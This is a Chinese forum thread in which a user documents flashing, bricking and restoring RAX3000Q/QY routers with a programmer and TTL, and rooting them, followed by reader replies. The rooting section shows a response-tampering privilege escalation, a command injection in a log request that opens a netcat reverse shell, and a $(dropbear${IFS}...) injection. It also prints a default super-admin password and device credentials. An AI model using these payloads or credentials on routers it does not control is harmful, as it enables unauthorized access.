移动RAX3000Q/QY 从免拆刷机到TTL刷机再到成砖再到恢复原厂的艰辛路程详解

ponyjs

前言：
第一个这个是记录帖子，并不算是一个教程帖子，当然这里也包括了我所有的折腾记录，以及遇到一些问题时候如何解决的，所以如果需要同步解决一致性问题，请带着耐心看完，否则哪一步操作失误均可成砖。
第二个这里会较为详细记录了，编程器刷机的方式，其中包括了，超级账号，SSH权限等固化问题，以及现在市面我所能了解到的一些固件带来的优缺点，极其各种需要注意的点（指代刷机等操作权限，其实际对机器稳定性不做测试）
第三个帖子里面所涉到的操作均是在其他大佬的基础上引用而来，我在下发均会标注其原创来源。
第四个这里的操作可能会操作损坏您的机器，请仔细小心操作，若带来损坏自行负责。
若以上您不认可，请直接X掉此窗口，

我们先从最粗暴的刷机方式说起：编程器大法
1、需要的工具：ch341a，1.8v转接板 、一双会飞线大法的双手

看就是这样飞好线



然后组装完毕，就是这样的一个状态了，插入电脑，使用SNANDer编程器来操作，SNANDer的驱动安装时候需要把ch341a的驱动卸载调用，使用他自带的驱动安装软件来安装，具体使用细则可以参考@Alangoa的关于：CH341A软件更新及刷入NAND-SPI详细教程
操作：下载SNANDer后解压，在目录上输入cmd，回车运行，出现小黑框内输入：

1. SNANDer_x86.exe -i

复制代码

检查编程器连接是否正常识别，效果如下

正常识别之后，如果你的机器是原厂固件，如果是非原厂固件，这一步可考虑直接跳过，
若此前没刷过大分区和UBOOT的，只刷过集客这一步骤也可以进行操作，请您不要吝啬这一步操作，因为这一步可以解决你以后带来的种种不便
操作：在CMD的黑框内输入：

1. SNANDer_x86.exe -d -r plc_rax3000qy_1.bin

复制代码

等待1200秒，
你的文件目录就会出现一个名为（plc_rax3000qy_1.bin）文件，这是你这台设备的原厂编程器固件备份（正常执行一次即可，但是确保备份的可靠性，请执行在执行一次）

1. SNANDer_x86.exe -d -r plc_rax3000qy_2.bin

复制代码

等上面执行完毕之后，将两个备份出来的文件，使用二进制对比软件（BCompare）对比，如果一样，则表示你备份成功了，如果不一样请自行排错，在备份一次，他可以解决你之后带来的种种问题


操作：擦除闪存上的数据，在CMD执行下发命令，大概5秒即可完成

1. SNANDer_x86.exe -d -e

复制代码

操作：写入编程器固件
第一种：写入编程器固件后，自动执行校验（等待时间1200秒）（无经验者推荐）

1. SNANDer_x86.exe -d -v -w 固件名字 假设固件名为：old_rax3000.bin

复制代码

1. SNANDer_x86.exe -d -v -w old_rax3000.bin

复制代码

第二种：写入编程器固件后，不自动执行校验（等待时间1200秒）（有经验者推荐）

1. SNANDer_x86.exe -d -w 固件名字 假设固件名为：old_rax3000.bin

复制代码

1. SNANDer_x86.exe -d -w old_rax3000.bin

复制代码

执行结束（ps：做自动校验，结束后是有两个ok的，会有两个1200秒左右的提示）


恭喜你，当你看到这个OK的时候，不出意外你的机器，可以正常开机了

到了这里那么我们就来说说各个编程器固件的缺点和优点
1、如果你使用的是自己的原厂编程器固件，那么恭喜你的mac和sn串是匹配的，你可以随便参考下方我要介绍的提权免拆SSH的方法了，总有一种适合你。
2、如果你使用的是我的提供的编程器固件，那么久请好好听说我说，下发每一种固件的缺陷极好处

1. 第一种：原厂固件old_rax3000_1.bin
   
2. 他是原厂备份固件，无任何修改的，其包含的信息有
   
3. mac：7C:6A:60:34:18:40，串：081109322404416 111057632404416
   
4. 2.4G:SSID：eh4a，5GSSID：111 密码：5393ACCC，后台密码：519$ABBB
   
5. 优点：原厂mesh组网，缺陷：无法使用最简单的提权破解SSH功能，无超级账号，无luci，可玩性极差，仅仅适合救砖使用

复制代码

1. 第二种：固化ssh_固件日期220106_rax3000.bin
   
2. 他是基于上方第一种固件，进行提权后，固化了ssh的编程器固件
   
3. 优点：原厂mesh组网，支持添加超级账号，包含信息参考上方，其原厂编译时间是：22年0106，可以直接进入免密SSH后台，root用户

复制代码

1. 第三种：rax3000_0414 - 副本.bin
   
2. 他是基于上方第一种固件，进行提权后，固化了ssh的编程器固件
   
3. 优点：原厂mesh组网，支持添加超级账号，包含信息参考上方，其原厂编译时间是：22年0414，可以直接进入免密SSH后台，root用户

复制代码

1. 第四种：rax3000q_factory_old - 副本.bin
   
2. 他是基于上方第一种固件，恢复了原厂固件ubi的
   
3. 优点：原厂mesh组网，无ssh权限，但是自带超级账号，支持最简单的提权获取ssh，luci

复制代码

他们共同的好处就是都拿来就转，其缺陷也尤为明显，就是mac其实是固定的，也就是说你拥有多台设备的时候，都想恢复原厂
均会存在一个问题mac冲突的问题，就是你无法mesh组网，除非你拥有不同mac的原厂固件备份
那么多固件如何选择呢？如果你是一个大神，那么你可以拿第一个固件作为底子使用二进制软件修改mac，
然后刷回去就可以可以了，我也试了，但是我改完之后，刷进去，每次重置之后ssid密码均会重置，后台密码，也就是每一次都是不一样的，后台都无法进入，可能是我修改的不对的问题导致的
第二，第三种固件也是如此，但是好处在于改了mac之后，可以直接ssh，使用：mdlcfg -e 也就是可以直接看到配置信息,这里就包括了，所有的配置信息
所以重点来来了：123种固件，若通过二进制软件修改mac之后，刷入之后会直接重置一次信息，之后无法对设备进行恢复出厂，否则无法进入后台，除非你可以得到他的密码算法。
第四种固件，也有上述的缺点，改mac之后每次恢复出厂会重置信息，但是好处在于他自带超级账号（用户名：superadmin 密码：83583000）
可以直接进入后台，直接看到密码信息，和重置密码和后台密码，可以进行简易提权进去ssh

第二种：TTL大法刷机（简单概述）
接好TTL，插入电脑，插入电源 按回车，中断（这里可能部分机器无法中断，具体原因不详，但是无关3.3v或者1.8v的ttl问题，我都有，无法中断的机器就是无法中断）

刷机操作：架设好tftpd服务器，网段192.168.10.0/24，网上到处都是资料，就不说了。
接上ttl ，波特率115200，（8-1-无-无）。
1. setenv serverip 192.168.10.2 <-（你的tftpd服务器地址，本机为10.10，需要改网段的自己改）
2. tftpboot 0x44000000 mtd17.bin <-（文件名）
<Bytes transferred = 50593792 (3040000 hex)>（返回的文件大小）
3. flash rootfs 0x44000000 0x3040000 <-（上面那个文件大小）
简单概述了，具体请参考论坛内的其他操作帖子，以上内容引用至[url=home.php?mod=space&uid=292867]@leo357449107 的和目 cmiot-ax18 dts 及 qsdk[/url]中设计到的操作内容

下面介绍一下提权ssh的问题了
第一种简单提权，可以直接参考[url=home.php?mod=space&uid=792941]@noel902217 的 中国移动RAX3000Q最简单解锁telnet/ssh，持久化超级管理员账号方法[/url]
他这个方法适用的核心在于，你进入路由器后台之后，点诊断-ping-里面的循环次数是10的这种原厂固件，可以直接使用他的这个办法，进行简单提权获取ssh

第二种复杂提权，是参考了[url=home.php?mod=space&uid=3083]@kevin Williams (最新)中移RAX3000Q路由器破解shell教程[/url]
但是他是文本叙述加gif，而且存在一些操作盲点，所以我复述一下，和一些自己踩坑的地方
他的方法适用于进入路由器后台后，点诊断-ping，循环次数是4时候这种原厂固件
需要使用到的工具：Reqable（下载地址） 和 NetCat（安装方法）

和一台手机，安卓或者IOS均可，在商定安装手机版的Reqable 并且完成证书的安装，这里按他提示操作即可

操作开始，第一步，打开电脑的Reqable，点左上，显示你电脑ip的右边有个手机的图标，用你的手机扫描连接上，你就会看到如下的界面


然后手机打开浏览器，输入192.168.10.1，进入路由器登录后台，登录进去，你就会在电脑的Reqable看到一个带有/item/login的抓包信息，按下发图片右键操作

添加修改响应的规则 "account_level": "3" 替换 "account_level": "1"，如下图所示



然后手机退出登录，重新登录进去，点到日志管理，并且打开开关



接下来在pc的Reqable中找到下图显示的这个抓包（双击就可以看到你他的日志内容在你的右下显示那样）

右键他，编辑


在请求体内的.log后面加入

1. |rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ip地址 4444 >/tmp/f

复制代码

接下来在NetCat的文件中的目录里面输入cmd回车，然后在黑框内输入nc -lvnp 4444，如下发图片所示



然后在Reqable中点击发送，就可以在cmd里面，看到这样的界面了

然后在这里输入passwd，之后输入两次admin
然后在输入：

1. $(dropbear${IFS}-p${IFS}22)

复制代码

然后再打开ssh工具，连接上192.168.10.1，就可以进入ssh了，接下来就可以进行ssh的固化了，
具体其他具体操作参看上方提到的简单提权ssh里面的操作了，附上操作的细节图，即可完成固化操作





如果你还看到这里的话那么我想说下我困扰的地方，也请大神帮我解答：如何优雅修改mac且不恢复出厂的时候都会重置一次路由器信息，
然后如果各位大佬大哥，也有比可使用编程器的条件话，备份下你的原厂编程器固件提供给大家使用
这样即使在无法修改mac的情况下，当我们拥有足够多的编程器固件，也可以进行多台mesh组网，岂不是优雅

接下来附上所有的固件和操作涉及到的工具包
提取码:BBTk

tonyk

思考一下，感谢分享

usbcdrom

大型技术贴子，我以前也是连续折腾过，理解楼主的心情，支持楼主

fy1515

都整到这个地步了， 不能直接刷成op，不使用原厂固件吗？

温子馨

xuyao ，所以下载

温子馨

nibi啊，第四种方法 成功了。。

maxpbds

有没有人性？这种奉献型的帖子居然不加精置顶！

wstchql

牛逼！我终于免ttl可root了

bache12138

如何优雅修改mac且不恢复出厂的时候都会重置一次路由器信息，
可以提供一种思路供参考：在开机启动时执行一次ifconfig eth0 hw ether 00:AA:BB:CCD:EE

wsygf

很牛，我这个3000qy就是刷砖了，可惜本人焊接手艺太差了，难度较高，

moritenw

这是好文章，mark一下，以备不时之需

jjdul

楼主发的是编程器固件，ttl刷机需要解包才能刷，区别类似操作系统的硬盘克隆和分区克隆。

liufanl

楼主能说一下怎么修改MAC地址吗？一般是MAC地址和SN号算SSID和密码。

wsbd

很好很全面，就是看了有些复杂，研究下

落澎莅

我试了ttl刷机，发现无法打断。打算试一下大佬的netcat的方法。大家谨慎拆机ttl，成功率不是百分百。